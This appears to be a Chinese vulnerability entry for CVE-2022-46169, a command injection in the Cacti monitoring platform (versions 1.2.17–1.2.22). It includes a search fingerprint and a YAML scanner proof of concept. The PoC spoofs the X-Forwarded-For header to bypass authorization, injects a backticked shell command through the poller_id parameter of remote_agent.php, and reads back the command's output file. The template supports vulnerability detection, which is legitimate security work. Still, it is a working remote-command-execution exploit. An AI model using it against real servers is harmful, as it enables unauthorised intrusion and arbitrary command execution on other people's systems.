漏洞描述
Cacti是一个服务器监控与管理平台。在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令
app="Cacti-监控系统"
CVE-2022-46169: Cacti remote_agent.php 远程命令执行漏洞
PoC代码[已公开]
id: CVE-2022-46169
info:
name: Cacti remote_agent.php 远程命令执行漏洞
author: zan8in
severity: high
verified: true
description: |
Cacti是一个服务器监控与管理平台。在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令
app="Cacti-监控系统"
reference:
- http://wiki.peiqi.tech/wiki/webapp/Cacti/Cacti%20remote_agent.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2022-46169.html
set:
r1: randomLowercase(8)
rules:
r0:
request:
method: GET
path: /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`id>{{r1}}.txt`
headers:
X-Forwarded-For: 127.0.0.1
expression: response.status == 200 && response.body.bcontains(b'"local_data_id":')
r1:
request:
method: GET
path: /{{r1}}.txt
headers:
X-Forwarded-For: 127.0.0.1
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()